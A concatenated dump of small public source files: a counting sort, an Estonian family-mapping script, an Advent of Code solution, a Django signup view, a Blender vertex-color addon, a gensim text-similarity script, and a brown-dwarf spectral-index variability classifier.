등장횟수를 담을 배열을 만든다\n n = max(arr)\n count = [0] * (n+1)\n \n # n이 등장할때마다 그 등장횟수를 하나씩 늘려나간다\n for n in arr :\n count[n] += 1\n \n # count 배열을 0부터 n까지 세어서, 해당 숫자의 등장빈도수만큼 해당 숫자를 result 배열에 넣는다\n for i in range(len(count)) :\n for j in range(count[i]) :\n result.append(i)\n \n return result","repo_name":"KimHyungkeun/Algorithm","sub_path":"HackerRank/Sorting/Countingsort2.py","file_name":"Countingsort2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31855373984","text":"def seosta_lapsed_ja_vanemad(lapsed, nimed):\n with open(lapsed) as fail:\n lapsed = fail.read().strip().split(\"\\n\")\n with open(nimed) as fail:\n nimed = fail.read().strip().split(\"\\n\")\n \n nimi_kood_dict = {}\n for nimi_kood in nimed:\n nimi, kood = nimi_kood.split(\" \", 1)\n nimi_kood_dict[nimi] = kood\n vanem_laps_dict = {}\n \n for vanem_laps in lapsed:\n vanem_id, laps_id = vanem_laps.split()\n if laps_id not in vanem_laps_dict:\n vanem_laps_dict[laps_id] = set()\n vanem_laps_dict[laps_id].add(vanem_id)\n else:\n vanem_laps_dict[laps_id].add(vanem_id)\n \n result = {}\n \n for laps, vanem in vanem_laps_dict.items():\n vanemad = set()\n for v in vanem:\n vanemad.add(nimi_kood_dict[v])\n result[nimi_kood_dict[laps]] = vanemad\n \n for laps, vanemad in result.items():\n print(f\"{laps}: {', '.join(vanemad)}\")\n return result\n \nseosta_lapsed_ja_vanemad(\"lapsed.txt\", \"nimed.txt\")","repo_name":"NFilin10/TU_programming_course","sub_path":"kodutööd/10_kodutöö/kodu1.py","file_name":"kodu1.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15120238305","text":"#!python3\n\n'''Day 14, part 1.'''\n\nfrom part10 import knot_hash\n\n\nTEST = 'flqrgnkx'\nCODE = 'ugkiagan'\n\n\ndef hex_to_bin(hex_string):\n '''Convert hex string to binary string.\n\n >>> hex_to_bin('1')\n '0001'\n >>> hex_to_bin('8')\n '1000'\n >>> hex_to_bin('f')\n '1111'\n >>> hex_to_bin('a0c2017')\n '1010000011000010000000010111'\n >>> hex_to_bin('70c2017')\n '0111000011000010000000010111'\n '''\n parts = []\n for x in hex_string:\n int_x = int(x, 16)\n parts.append(format(int_x, '04b'))\n return ''.join(parts)\n\n\ndef sum_bin_digits(bin_string):\n '''Sum the digits of binary number.\n\n >>> sum_bin_digits('111')\n 3\n >>> sum_bin_digits('1000101011')\n 5\n '''\n return bin_string.count('1')\n\n\ndef squares_used(code):\n '''Calculate squares used.\n\n >>> squares_used('flqrgnkx')\n 8108\n '''\n total = 0\n for i in range(128):\n full_code = f'{code}-{i}'\n h = knot_hash(full_code)\n b = hex_to_bin(h)\n # print(full_code)\n # print(b)\n count = sum_bin_digits(b)\n total += count\n return total\n\n\ndef main():\n '''Main entry point.'''\n total = squares_used(CODE)\n print(total)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2017/part14.py","file_name":"part14.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8032865713","text":"from account.models import Account\nfrom django.shortcuts import render, redirect\nfrom .forms import SignUpForm\nfrom fitness.models import WeightAtDate\n\n# Create your views here.\n\ndef signup(request):\n\n if request.method == \"POST\":\n f = SignUpForm(request.POST)\n\n if f.is_valid():\n user = f.save()\n\n weight = f.cleaned_data['weight']\n if weight:\n weight_at_date = WeightAtDate(weight=weight, user=user)\n weight_at_date.save()\n \n \n return redirect('/')\n \n \n form = SignUpForm()\n\n return render(request, 'register/signup.html', {'form':form})\n","repo_name":"unibucMrz/licenta","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71786847186","text":"bl_info = {\n \"name\": \"Ctools Addon\",\n \"author\": \"Brendan Fitzgerald\",\n \"version\": (1, 0),\n \"blender\": (2, 93, 0),\n \"location\": \"View3D > Shelf > Ctools\",\n \"description\": \"Collection of tools that are useful for use in production assets\",\n \"warning\": \"\",\n \"doc_url\": \"https://github.com/c1112/bl_ctools/blob/main/README.md\",\n \"category\": \"Production\",\n}\n\nimport bpy\nimport bmesh\nimport random\nfrom mathutils import Color, Vector\n\nclass CTOOLS_OT_Restpos(bpy.types.Operator):\n bl_idname = \"ctools.rest\"\n bl_label = \"Set Rest Position\"\n\n def execute(self, context):\n my_object = bpy.context.active_object.data\n vert_list = my_object.vertices\n color_map_collection = my_object.vertex_colors\n\n try:\n color_map = color_map_collection['rest']\n except:\n color_map = color_map_collection.new(name='rest')\n\n\n i = 0\n for poly in my_object.polygons:\n for idx in poly.loop_indices:\n loop = my_object.loops[idx]\n v = loop.vertex_index\n x = (vert_list[v].co.x )\n y = (vert_list[v].co.y )\n z = (vert_list[v].co.z )\n t = 0\n final = (x,y,z,t)\n color_map.data[i].color = final\n i += 1\n\n return {'FINISHED'}\n\nclass CTOOLS_OT_VtxClr(bpy.types.Operator):\n \"\"\"Sets Vertex Color in Mesh Edit Mode\"\"\"\n bl_idname = \"ctools.vtxclr\"\n bl_label = \"Set Vertex Color\"\n btn_name : bpy.props.StringProperty()\n\n def execute(self, context):\n #get the objects for finding the verts\n edit_object = bpy.context.edit_object.data\n bm = bmesh.from_edit_mesh(edit_object)\n vert_list = bpy.context.active_object.data.vertices\n\n #setup the RGB Value based on ui input\n if(self.btn_name == \"random\"):\n RGBA = [random.uniform(0,1) for i in range(3)]\n RGBA.append(0)\n else:\n RGBA = clr = context.scene.mytool_color\n\n #get the selected faces\n selfaces = [ f for f in bm.faces if f.select]\n\n #selected verts and colors\n data = {}\n\n for poly in selfaces:\n for vrt in poly.verts:\n idx = vrt.index\n data[idx] = RGBA\n\n #switch modes and reaccess data\n bpy.ops.object.mode_set(mode='OBJECT')\n\n #get the mesh to run over\n mesh = bpy.context.active_object.data\n color_map_collection = mesh.vertex_colors\n\n try:\n color_map = color_map_collection['Cd']\n except:\n color_map = color_map_collection.new(name='Cd')\n #set inital color map to black\n i = 0\n for polygon in mesh.polygons:\n for idx in polygon.loop_indices:\n color_map.data[i].color = (0,0,0,0)\n i += 1\n\n #set Cd to the current active colormap\n if not color_map.active:\n color_map.active = 1\n\n #cycle through each polygon\n for polygon in mesh.polygons:\n #for each polygon cycle though the selected verts\n for selected_vert in data:\n #grab that vertices associated with the current polygon\n for i, index in enumerate(polygon.vertices):\n #if the selected vert is found in the current polygon\n if selected_vert == index:\n #return the loop indices for the selected vertex\n loop_index = polygon.loop_indices[i]\n #use the loop index to set the vertex color\n color_map.data[loop_index].color = data[selected_vert]\n\n\n #switch modes back to edit\n bpy.ops.object.mode_set(mode='EDIT')\n\n return {'FINISHED'}\n\n################################################################################\n################################################################################\n\nclass CTOOLS_PT_Mesh(bpy.types.Panel):\n \"\"\"Creates a Sub-Panel in the Property Area of the 3D View\"\"\"\n bl_label = \"CTools Mesh\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"CTools\"\n bl_context = \"mesh_edit\"\n\n def draw(self, context):\n obj = context.object\n layout = self.layout\n\n row = layout.row()\n row.label(text=\"Active object is: {}\".format(obj.name))\n\n row = layout.row()\n row.prop(context.scene, \"mytool_color\")\n\n row = layout.row()\n usrop = row.operator(CTOOLS_OT_VtxClr.bl_idname, text=\"User Defined Vertex Color\")\n usrop.btn_name = \"user\"\n\n row = layout.row()\n randop = row.operator(CTOOLS_OT_VtxClr.bl_idname, text=\"Random Vertex Color\")\n randop.btn_name = \"random\"\n\nclass CTOOLS_PT_Object(bpy.types.Panel):\n \"\"\"Creates a Sub-Panel in the Property Area of the 3D View\"\"\"\n bl_label = \"CTools Object\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"CTools\"\n bl_context = \"objectmode\"\n\n def draw(self, context):\n obj = context.object\n layout = self.layout\n\n row = layout.row()\n row.operator(CTOOLS_OT_Restpos.bl_idname, text=\"Generate Rest Position\")\n\n\ndef register():\n #Register Operators\n bpy.utils.register_class(CTOOLS_OT_VtxClr)\n bpy.utils.register_class(CTOOLS_OT_Restpos)\n #Register Panels\n bpy.utils.register_class(CTOOLS_PT_Mesh)\n bpy.utils.register_class(CTOOLS_PT_Object)\n\n\n #Hack for the moment. should roll this into a class\n bpy.types.Scene.mytool_color = bpy.props.FloatVectorProperty(\n name = \"Color Picker\",\n subtype = \"COLOR\",\n size = 4,\n min = 0.0,\n max = 1.0,\n default = (1.0,1.0,1.0,1.0))\n\n\ndef unregister():\n #Unregister Operators\n bpy.utils.unregister_class(CTOOLS_OT_VtxClr)\n bpy.utils.unregister_class(CTOOLS_OT_Restpos)\n #Unregister Panels\n bpy.utils.unregister_class(CTOOLS_PT_Mesh)\n bpy.utils.unregister_class(CTOOLS_PT_Object)\n\n del bpy.types.Scene.mytool_color\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"c1112/bl_ctools","sub_path":"ctools.py","file_name":"ctools.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17169977887","text":"# Your code from here\nimport csv\n\n\n\ndef get_musicians(file):\n import codecs\n from bs4 import BeautifulSoup\n f = codecs.open(file, 'r', 'utf-8')\n soup = BeautifulSoup(f.read(), 'lxml')\n l = list()\n for a in soup.find_all('a', href=True, title=True, text=True):\n if a['title'] == a.get_text():\n if '_' in a['href']:\n if a['href'].count('_') == 1:\n l.append(\"https://en.wikipedia.org\" + a['href'])\n return l\n\n\ndef get_text(name: object) -> object:\n import codecs\n from bs4 import BeautifulSoup\n f = codecs.open(name, 'r', 'utf-8')\n page_soup = BeautifulSoup(f.read(), 'lxml')\n all_text = \"\"\n for tag in page_soup.find_all('p'):\n all_text += tag.get_text()\n\n return all_text\n\n\ndef run():\n import os\n from gensim import corpora\n from gensim.parsing.preprocessing import STOPWORDS\n\n doc_list = [entry for entry in os.scandir('samples')]\n\n documents = [get_text(doc) for doc in doc_list]\n texts = [[word for word in document.lower().split()\n if word not in STOPWORDS and word.isalnum()]\n for document in documents]\n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n\n from gensim import models, similarities\n lsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)\n\n test_list = [entry for entry in os.scandir('test 3')]\n\n for test in test_list:\n vec_bow = dictionary.doc2bow(get_text(test).lower().split())\n vec_lsi = lsi[vec_bow]\n index = similarities.MatrixSimilarity(lsi[corpus])\n sims = index[vec_lsi]\n # print(sims)\n # d.append(test, doc_list[sims])\n\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n d = list()\n d.append((\"TestName\", \"SampleName\"))\n i = 0\n\n for sim in sims:\n if i >= len(test_list):\n break\n t = test_list[i].name\n i = i + 1\n t = str(t).split('.')[0]\n s = doc_list[sim[0]].name\n s = str(s).split('.')[0]\n\n d.append((t, s))\n\n return d\n\n\n# datafile = \"boogiewoogie.html\"\n# data = get_musicians(datafile)\n# print(data)\n\n# datafile = \"carolinedahl.html\"\n# data = get_text(datafile)\n# print(data)\n\n# all_text = \"\"\n# for entry in os.scandir('samples'):\n# all_text += get_text(entry)\n# print(all_text)\nd = run()\n\nwith open('output.csv', 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_NONE)\n for list in d:\n wr.writerow(list)\n","repo_name":"APCHITNIS/BAMM.101x","sub_path":"textmining_1.py","file_name":"textmining_1.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26089189369","text":"#time: O(N^(T/m)), N is number of candidates, T is the target, m is the minmum number in candidates\n#space: for collect: O(T/m), depth: O(T/m)\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n if not candidates or target <= 0:\n return []\n collect = []\n self.result = []\n self.helper(collect, 0, candidates, 0, target)\n return self.result\n \n def helper(self, collect, start, candidates, cur_sum, target):\n if cur_sum == target:\n self.result.append(list(collect))\n return\n if cur_sum > target:\n return\n for idx in range(start, len(candidates)):\n collect.append(candidates[idx])\n self.helper(collect, idx, candidates, cur_sum+candidates[idx], target)\n collect.pop()\n ","repo_name":"finderkiller/LeetCode","sub_path":"39CombinationSum.py","file_name":"39CombinationSum.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40631243354","text":"#// ============================================================================================= //\n#// //\n#// Filename: LTdwarfIndices_Set-indices.py //\n#// Description: Candidate Variable L and T brown dwarfs determination //\n#// using the Spectral Index method //\n#// //\n#// Version: 1 //\n#// Created: 13/06/2023 //\n#// Compiler: Python //\n#// //\n#// Author: Natalia Oliveros-Gomez //\n#// Email: onatalialucia@gmail.com //\n#// Company: Grupo Fisica Estelar Universidad de Guanajuato, México //\n#// //\n#// ============================================================================================= //\n#\n#// ============================================================================================= //\n#// Indications: You only need to modify the brown dwarf spectrum path // \n#// Indicate if it is L or T type //\n#// And if you want to print the index-index graph // \n#// //\n#// //\n#// //\n#// Compile with: python LTdwarfIndices // //\n#// ============================================================================================= //\n\n\nindices = 'Data/Models_indicesT.txt' #adds the directory and name of the file with the indices list\n#with names of indices: 'index_H', 'index_Jslope', etc ...\nspt = 'T' #add spectral type: T or L\nsave_index_index_plot = 'No' #If you don't want save the index-index plot change 'No'\nsave_histogram_plot = 'No'\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\n\nindices_data = pd.read_csv(indices, delimiter='\\t', thousands=',', decimal='.', comment='#')\n\ndef TdwarfIndices(indices_data):\n \n ############################ Spectral indeces template J2228 ###########################\n \n index_temp_J_M2228 = 0.205\n index_temp_H_M2228 = 0.463\n index_temp_HJ_M2228 = 0.4145\n index_temp_J_H_M2228 = 0.0451\n index_temp_Jslope_M2228 = 0.633\n index_temp_Jcurve_M2228 = 0.154\n \n \n ########################## define variability areas ###########################\n \n verts00 = [(0.2,0.35), (0.39,0.35), (0.463,0.2010), (0.65,0.05), (0.2,0.05), (0.2,0.35)]\n verts01 = [(0.2,0.55), (0.415,0.55), (0.462,0.4167), (0.4,0.28), (0.2,0.28), (0.2,0.55)]\n verts02 = [(0.038,0.55), (0.065,0.55), (0.065,0.28), (0.057,0.28), (0.038,0.55)]\n verts03 = [(0.067,0.68), (0.067,0.2), (0.0325,0.2), (0.067,0.68)]\n\n verts10 = [(0.038,0.35), (0.067,0.35), (0.067,0.05), (0.0442,0.2005),(0.038,0.35)]\n verts11 = [(0.43,0.35), (0.63,0.35), (0.65,0.201), (0.63,0.05), (0.43,0.05), (0.43,0.35)]\n verts12 = [(0.43,0.515), (0.646,0.462), (0.75,0.2), (0.43,0.2), (0.43,0.515)]\n verts13 = [(0.43,0.52), (0.63,0.52), (0.65,0.4169), (0.63,0.28), (0.43,0.28), (0.43,0.52)]\n\n verts20 = [(0.43,0.065), (0.85,0.065), (0.85,0.037), (0.43,0.046), (0.43,0.065)]\n verts21 = [(0.43,0.35), (0.85,-0.07), (0.43,-0.07), (0.43,0.35)]\n verts22 = [(0.2,0.35), (0.68,-0.07), (0.2,-0.07), (0.2,0.35)]\n verts23 = [(0.065,0.34), (0.065,-0.07), (0.025,-0.07),(0.065,0.34)]\n\n codes_5v = [\n Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n codes_4v = [\n Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n codes_3v = [\n Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n \n path00 = Path(verts00, codes_5v)\n path01 = Path(verts01, codes_5v)\n path02 = Path(verts02, codes_4v)\n path03 = Path(verts03, codes_3v)\n\n path10 = Path(verts10, codes_4v)\n path11 = Path(verts11, codes_5v)\n path12 = Path(verts12, codes_4v)\n path13 = Path(verts13, codes_5v)\n\n path20 = Path(verts20, codes_4v)\n path21 = Path(verts21, codes_3v)\n path22 = Path(verts22, codes_3v)\n path23 = Path(verts23, codes_3v)\n\n patch00 = patches.PathPatch(path00, facecolor='gray', lw=1, alpha=0.25)\n patch01 = patches.PathPatch(path01, facecolor='gray', lw=1, alpha=0.25)\n patch02 = patches.PathPatch(path02, facecolor='gray', lw=1, alpha=0.25)\n patch03 = patches.PathPatch(path03, facecolor='gray', lw=1, alpha=0.25)\n\n patch10 = patches.PathPatch(path10, facecolor='gray', lw=1, alpha=0.25)\n patch11 = patches.PathPatch(path11, facecolor='gray', lw=1, alpha=0.25)\n patch12 = patches.PathPatch(path12, facecolor='gray', lw=1, alpha=0.25)\n patch13 = patches.PathPatch(path13, facecolor='gray', lw=1, alpha=0.25)\n\n patch20 = patches.PathPatch(path20, facecolor='gray', lw=1, alpha=0.25)\n patch21 = patches.PathPatch(path21, facecolor='gray', lw=1, alpha=0.25)\n patch22 = patches.PathPatch(path22, facecolor='gray', lw=1, alpha=0.25)\n patch23 = patches.PathPatch(path23, facecolor='gray', lw=1, alpha=0.25)\n\n ######################### index-index plot ###########################\n \n\n # Save and display the figure\n if save_index_index_plot == 'Yes':\n plt.savefig('index-index-plot.pdf', bbox_inches='tight')\n if save_index_index_plot == 'No':\n plt.show()\n \n ######################### Variable or not? #########################\n \n \n fig = plt.figure(figsize=(24.0,13.5), constrained_layout = True) \n plt.rcParams['font.family'] = \"DejaVu Sans\" \n plt.rcParams['font.size'] = 25 \n plt.rc('xtick', direction='in')\n plt.rc('ytick', direction='in')\n\n ax1 = fig.add_subplot(341)\n ax1.set_xlabel('H-Index')\n ax1.set_ylabel('J-Index')\n ax1.plot(index_temp_H_M2228, index_temp_J_M2228,marker ='*',markersize=18, color='black')\n ax1.scatter(indices_data['index_H'], indices_data['index_J'],marker ='*' ,s=90, color='blue')\n\n ax2 = fig.add_subplot(342)\n ax2.set_xlabel('H-Index')\n ax2.set_ylabel('H/J-Index')\n ax2.plot(index_temp_H_M2228, index_temp_HJ_M2228,marker ='*',markersize=18, color='black')\n ax2.scatter(indices_data['index_H'], indices_data['index_HJ'],marker ='*' ,s=90, color='blue')\n\n ax3 = fig.add_subplot(343)\n ax3.set_xlabel('J-H-Index')\n ax3.set_ylabel('H/J-Index')\n ax3.plot(index_temp_J_H_M2228, index_temp_HJ_M2228,marker ='*',markersize=18, color='black')\n ax3.scatter(indices_data['index_J_H'], indices_data['index_HJ'],marker ='*' ,s=90, color='blue')\n\n ax4 = fig.add_subplot(344)\n ax4.set_xlabel('J-H-Index')\n ax4.set_ylabel('H-Index')\n ax4.plot(index_temp_J_H_M2228, index_temp_H_M2228,marker ='*',markersize=18, color='black')\n ax4.scatter(indices_data['index_J_H'], indices_data['index_H'],marker ='*' ,s=90, color='blue')\n\n ax5 = fig.add_subplot(345)\n ax5.set_xlabel('J-H-Index')\n ax5.set_ylabel('J-Index')\n ax5.plot(index_temp_J_H_M2228, index_temp_J_M2228,marker ='*',markersize=18, color='black')\n ax5.scatter(indices_data['index_J_H'], indices_data['index_J'],marker ='*' ,s=90, color='blue')\n\n ax6 = fig.add_subplot(346)\n ax6.set_xlabel('Jslope-Index')\n ax6.set_ylabel('J-Index')\n ax6.plot(index_temp_Jslope_M2228, index_temp_J_M2228,marker ='*',markersize=18, color='black')\n ax6.scatter(indices_data['index_Jslope'], indices_data['index_J'],marker ='*' ,s=90, color='blue')\n\n ax7 = fig.add_subplot(347)\n ax7.set_xlabel('Jslope-Index')\n ax7.set_ylabel('H-Index')\n ax7.plot(index_temp_Jslope_M2228, index_temp_H_M2228,marker ='*',markersize=18, color='black')\n ax7.scatter(indices_data['index_Jslope'], indices_data['index_H'],marker ='*' ,s=90, color='blue')\n\n ax8 = fig.add_subplot(348)\n ax8.set_xlabel('Jslope-Index')\n ax8.set_ylabel('H/J-Index')\n ax8.plot(index_temp_Jslope_M2228, index_temp_HJ_M2228,marker ='*',markersize=18, color='black')\n ax8.scatter(indices_data['index_Jslope'], indices_data['index_HJ'],marker ='*' ,s=90, color='blue')\n\n ax9 = fig.add_subplot(349)\n ax9.set_xlabel('Jslope-Index')\n ax9.set_ylabel('J-H-Index')\n ax9.plot(index_temp_Jslope_M2228, index_temp_J_H_M2228,marker ='*',markersize=18, color='black')\n ax9.scatter(indices_data['index_Jslope'], indices_data['index_J_H'],marker ='*' ,s=90, color='blue')\n\n ax10 = fig.add_subplot(3,4,10)\n ax10.set_xlabel('Jslope-Index')\n ax10.set_ylabel('Jcurve-Index')\n ax10.plot(index_temp_Jslope_M2228, index_temp_Jcurve_M2228,marker ='*',markersize=18, color='black')\n ax10.scatter(indices_data['index_Jslope'], indices_data['index_Jcurve'],marker ='*' ,s=90, color='blue')\n\n ax11 = fig.add_subplot(3,4,11)\n ax11.set_xlabel('H-Index')\n ax11.set_ylabel('Jcurve-Index')\n ax11.plot(index_temp_H_M2228, index_temp_Jcurve_M2228,marker ='*',markersize=18, color='black')\n ax11.scatter(indices_data['index_H'], indices_data['index_Jcurve'],marker ='*' ,s=90, color='blue')\n\n ax12 = fig.add_subplot(3,4,12)\n ax12.set_xlabel('J-H-Index')\n ax12.set_ylabel('Jcurve-Index')\n ax12.plot(index_temp_J_H_M2228, index_temp_Jcurve_M2228,marker ='*',markersize=18, color='black')\n ax12.scatter(indices_data['index_J_H'], indices_data['index_Jcurve'],marker ='*' ,s=90, color='blue')\n \n #Define the limits in yx plots\n ax1.set_ylim((index_temp_J_M2228 -0.15,index_temp_J_M2228 + 0.15))\n ax1.set_xlim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax2.set_ylim((index_temp_HJ_M2228 -0.12,index_temp_HJ_M2228 + 0.12))\n ax2.set_xlim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax3.set_ylim((index_temp_HJ_M2228 -0.12,index_temp_HJ_M2228 + 0.12))\n ax3.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n ax4.set_ylim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax4.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n\n ax5.set_ylim((index_temp_J_M2228 -0.15,index_temp_J_M2228 + 0.15))\n ax5.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n ax6.set_ylim((index_temp_J_M2228 -0.15,index_temp_J_M2228 + 0.15))\n ax6.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax7.set_ylim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax7.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax8.set_ylim((index_temp_HJ_M2228 -0.1,index_temp_HJ_M2228 + 0.1))\n ax8.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n\n ax9.set_ylim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n ax9.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax10.set_ylim((index_temp_Jcurve_M2228 -0.22,index_temp_Jcurve_M2228 + 0.22))\n ax10.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax11.set_ylim((index_temp_Jcurve_M2228 -0.22,index_temp_Jcurve_M2228 + 0.22))\n ax11.set_xlim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax12.set_ylim((index_temp_Jcurve_M2228 -0.22,index_temp_Jcurve_M2228 + 0.22))\n ax12.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n \n #Add variability areas plot\n ax1.add_patch(patch00)\n ax2.add_patch(patch01)\n ax3.add_patch(patch02)\n ax4.add_patch(patch03)\n ax5.add_patch(patch10)\n ax6.add_patch(patch11)\n ax7.add_patch(patch12)\n ax8.add_patch(patch13)\n ax9.add_patch(patch20)\n ax10.add_patch(patch21)\n ax11.add_patch(patch22)\n ax12.add_patch(patch23)\n \n # Save and display the figure\n if save_index_index_plot == 'Yes':\n plt.savefig('index-index-plot.pdf', bbox_inches='tight')\n if save_index_index_plot == 'No':\n plt.show()\n \n #Define the point indices in each plot\n puntos00_var = []\n puntos01_var = []\n puntos02_var = []\n puntos03_var = []\n puntos10_var = []\n puntos11_var = []\n puntos12_var = []\n puntos13_var = []\n puntos20_var = []\n puntos21_var = []\n puntos22_var = []\n puntos23_var = []\n \n for i in indices_data.index:\n puntos00_var.append([indices_data['index_H'][i], indices_data['index_J'][i]])\n puntos01_var.append([indices_data['index_H'][i], indices_data['index_HJ'][i]])\n puntos02_var.append([indices_data['index_J_H'][i], indices_data['index_HJ'][i]])\n puntos03_var.append([indices_data['index_J_H'][i], indices_data['index_H'][i]])\n puntos10_var.append([indices_data['index_J_H'][i], indices_data['index_HJ'][i]])\n puntos11_var.append([indices_data['index_Jslope'][i], indices_data['index_J'][i]])\n puntos12_var.append([indices_data['index_Jslope'][i], indices_data['index_H'][i]])\n puntos13_var.append([indices_data['index_Jslope'][i], indices_data['index_HJ'][i]])\n puntos20_var.append([indices_data['index_Jslope'][i], indices_data['index_J_H'][i]])\n puntos21_var.append([indices_data['index_Jslope'][i], indices_data['index_Jcurve'][i]])\n puntos22_var.append([indices_data['index_H'][i], indices_data['index_Jcurve'][i]])\n puntos23_var.append([indices_data['index_J_H'][i], indices_data['index_Jcurve'][i]])\n \n #Determine the point indices inside the variability areas in each plot\n inside00_var = path00.contains_points(puntos00_var)\n inside01_var = path01.contains_points(puntos01_var)\n inside02_var = path02.contains_points(puntos02_var)\n inside03_var = path03.contains_points(puntos03_var)\n inside10_var = path10.contains_points(puntos10_var)\n inside11_var = path11.contains_points(puntos11_var)\n inside12_var = path12.contains_points(puntos12_var)\n inside13_var = path13.contains_points(puntos13_var)\n inside20_var = path20.contains_points(puntos20_var)\n inside21_var = path21.contains_points(puntos21_var)\n inside22_var = path22.contains_points(puntos22_var)\n inside23_var = path23.contains_points(puntos23_var)\n \n cant_plots_var=[]\n for i in range(0,len(indices_data)):\n cant_plots_var.append(sum([inside00_var[i],inside01_var[i],inside02_var[i],inside03_var[i], inside10_var[i],\n inside11_var[i],inside12_var[i],inside13_var[i],inside20_var[i],inside21_var[i],\n inside22_var[i],inside23_var[i]]))\n\n print(cant_plots_var)\n #Histogram variability\n \n fig = plt.figure(figsize=(6, 4.5))\n\n plt.rcParams['font.family'] = \"DejaVu Sans\" # Tipo de letra general\n plt.rcParams['font.size'] = 15 # Tamaño de letra general\n plt.rc('xtick', direction='in')\n plt.rc('ytick', direction='in')\n\n plt.xlabel('Number of spectral index combinations') \n plt.ylabel(' Number of selected sources')\n plt.tick_params(axis='x', which='major')\n plt.tick_params(axis='y', which='major')\n\n plt.hist(cant_plots_var, alpha=1,bins=100, width = 1,color= 'silver',edgecolor = 'black', linewidth=1)\n plt.axvline(8.88, color = 'black', ls='-', linewidth=3)\n plt.xlim((0,12))\n plt.legend(fontsize=11)\n\n fig.tight_layout(pad=0.8)\n \n # Save and display the figure\n if save_histogram_plot == 'Yes':\n plt.savefig('histogram-plot.pdf', bbox_inches='tight')\n if save_histogram_plot == 'No':\n plt.show()\n \n #pass threshold? 11\n print('{}{}{}'.format('Your brown dwarf fall in ',cant_plots_var[0],' variable areas of 15'))\n if cant_plots_var[0] > 8:\n a = print('Your brown dwarf is candidate variable')\n else:\n a = print('Your brown dwarf is candidate non-variable')\n return a , cant_plots_var[0] \n\n\n\n\ndef LdwarfIndices(dwarf_data):\n \n ############################ Spectral indeces template LP261-75B ###########################\n \n index_temp_mostH = 1.913080124768479\n index_temp_mostJ = 0.23732289733907183\n index_temp_less = 2.2632193763577337\n index_temp_Jcurve = 1.363828699841246\n index_temp_H2OJ = 0.7366212163364537\n index_temp_CH4J = 0.7414549450272985\n\n \n ############################ define variability areas ###########################\n \n verts00 = [(3,5.3), (3,0.78), (0.9,-0.5), (3,5.3)]\n verts01 = [(-0.55,2.262), (0.8,2.262), (0.8,0.78), (-0.55,0.78), (-0.55,2.32)]\n verts02 = [(0,2.72), (1.5,1.8), (1.8,0.78), (0,0.78), (0,2.54)]\n verts03 = [(0.3,3.5), (2.6,0.8), (0.3,0.7), (0.3,3.5)]\n\n verts10 = [(0.3,2.92), (2.6,-1.8), (0.3,-1.3),(0.3,3.2)]\n verts11 = [(0.4,0.8), (1.362,0.8), (1.366,-0.25),(0.4,-0.25),(0.4,0.8)]\n verts12 = [(0.39,3), (2.35,3),(2.35,2.15),(0.39,1.62), (0.39,3)]\n verts13 = [(-0.25,1.905), (1.9,1.905), (1.9,3), (-0.25,3), (-0.25,1.905)]\n\n verts20 = [(-0.5,2.41), (0.8,1.51), (0.8,3), (-0.5,3), (-0.5,2.41)]\n verts21 = [(0.739,0.8), (-0.25,0.8), (-0.25,-0.25), (0.742,-0.25),(0.739,0.8)]\n verts22 = [(0.739,0.8), (1.4,0.8), (1.4,-0.25), (0.742,-0.25),(0.739,0.8)]\n verts23 = [(0.2,2.24), (1.26,2.29), 